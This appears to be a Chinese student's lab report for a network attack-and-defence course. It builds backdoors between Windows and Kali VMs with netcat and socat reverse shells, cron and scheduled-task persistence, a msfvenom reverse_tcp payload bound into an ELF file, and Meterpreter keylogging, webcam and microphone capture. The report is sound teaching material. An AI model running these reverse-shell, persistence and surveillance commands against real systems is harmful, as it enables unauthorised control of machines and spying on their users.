20212325 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212325刘方同 2024-04-03 13:35:59

目录

  • 1.实验内容
  • 2.实验过程
  • 1.问题回答
  • (1)例举你能想到的一个后门进入到你系统中的可能方式?
  • (2)例举你知道的后门如何启动起来(win及linux)的方式?
  • (3)Meterpreter有哪些给你映像深刻的功能?
  • (4)如何发现自己有系统有没有被安装后门?
  • 2.环境准备
  • 3.具体实验
  • (1)使用netcat获取主机操作Shell,cron启动任务
  • (2)使用socat获取主机操作Shell, 任务计划启动
  • (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
  • 3.问题及解决方案
  • 4.学习感悟、思考等
  • 参考资料

1.实验内容

  1. 任务主机使用netcat获取虚拟机操作shell,cron启动定时任务监听虚拟机端口。
  2. 虚拟机使用socat获取主机操作shell,启动计划任务。
  3. 掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。

2.实验过程

1.问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
  • 笔记本的固件或者编译器自带。
  • 安装应用软件时附带的。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
  • windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序。
  • linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。
(3)Meterpreter有哪些给你映像深刻的功能?
  • 可以生成任意形式的shellcode,操作简便。
  • 针对不同操作系统有很多种提权的方式。
  • 可以获取攻击机的摄像头。
(4)如何发现自己有系统有没有被安装后门?
  • 使用杀软扫描。
  • 查看端口、服务、任务计划、开机自启动项等是否异常。

2.环境准备

  • 主机:Windows 7
  • 靶机:Kali Linux Debian 10

3.具体实验

(1)使用netcat获取主机操作Shell,cron启动任务
  • 查看主机和靶机的ip
    • 主机ip

      img

    • 靶机ip:

      img

  • 在主机中使用ncat -l -p 2325(学号后四位)监听本机的2325端口

    img

  • 在主机中获取虚拟机shell
    • 在虚拟机中使用nc 172.20.10.5(主机IP) 2325 -e /bin/sh连接主机反弹shell

      img

    • 成功getshell

      img

  • 在虚拟机中获取主机shell
    • 在虚拟机中用nc -l -p 2325监听主机2325端口

      img

    • 在主机中用ncat -e cmd 192.168.174.141 1218

      img

  • 在虚拟机中启动cron并在主机监听
    • 先在虚拟机上用crontab -e启动cron,cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

      img

    • crontab 指令增加一条定时任务, -e 表示编辑。添加 * * * * * /bin/netcat 172.20.10.5 2325 -e /bin/sh 表示每秒反向连接 Windows 主机的 2325 端口。

      img

    • 主机端监听,回车,1秒过后可以输入命令。

      img

      (2)使用socat获取主机操作Shell, 任务计划启动
  • 创建任务,完成命名,设置触发器和操作。

    img


    img

  • 触发器按预定时间,到时间后windows主机会运行socat.exe并弹窗

    img

  • windows主机弹窗后即可在linux端输入指令

    img


    img

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • 在Kali上用MSF meterpreter生成后门可执行程序20212325_backdoor.exe

    img

  • 在Windows上监听2325端口等待接收可执行文件20212325_backdoor.exe

    img

  • 在Kali上将生成的20212325_backdoor.exe传送给Windows

    img

  • 然后就可以看到windows主机端出现了后门文件

    img

  • 在kali上使用msfconsole指令进入msf控制台

    img

  • 对msf控制台进行配置,依次输入以下命令

    img

  • 接着输入exploit进行监听,在Windows在打开20212325_backdoor.exe后成功获取到Windows的shell(要把所有杀毒软件退出,否则打开后门程序时很容易出现拒绝访问的情况)

    img


    img

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 获取目标主机音频,在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)

    img

  • 获取目标主机摄像头,输入webcam_snap指令控制摄像头进行拍照

    img


    img

  • 获取击键记录,输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录(-d可设置时长)

    img

  • 截取主机屏幕,使用screenshot指令可以进行截屏

    img


    img

  • 提权操作

    img

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
  • 使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.191.128 LPORT=4308 -x /home/20212325lft/20212325_pwn1 -f elf > 20212325_pwn2生成以20212325_pwn1模板这个elf文件格式的shellcode文件

    img

  • 输入指令msfconsole,进入msf命令行

    img

  • 对msf进行配置,进入handler模式,设置payload

    img

  • 设置host、post,启动监听

    img

  • 在kali上新开一个终端窗口,先加权限 chmod +x 20212325_pwn2,之后运行。此时攻击机Linux上已经获得了靶机Linux的连接,并且得到了远程控制的shell,执行ls命令。

    img

    3.问题及解决方案

  • 问题1:crontab 指令增加定时任务失败
    问题1解决方案:在网上查找类似问题的解决方法后看到了实验一中写入文件的方式,尝试后成功

    img

  • 问题2:在sudo命令下使用MSF meterpreter生成后门可执行程序20212325_backdoor.exe时权限仍旧不够
  • 问题2解决方案:切换到root用户下进行操作

    img

    4.学习感悟、思考等

    理解好原理再实验:使用MSF meterpreter生成可执行文件,利用ncat传送到主机的时设定LHOST时填写的应该是kali的IP,而kali发送生成的后门文件传送给Windows时应该填windows的IP。前者是因为要反弹回连Kali,后者是因为要传输给windows必须获知其IP。要理解好实验的内在逻辑性才不至于填乱,一开始未想清楚就做实验导致做了好几次。
    提高对于后门程序的警惕性:使用MSF很容易就能控制Windows。windows上给了用户很大的自由空间,甚至杀毒软件对可疑程序的处理都会询问用户。如果我们安全意识不够高,不定时检查系统是否存在漏洞,经常随意在网上下载文件,用破解程序来破解收费软件(此类程序往往会说明破解会导致杀软误报,让我们关闭杀软),很容易就给后门程序可趁之机,让我们完全暴露在威胁下。

参考资料

...全文
33 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧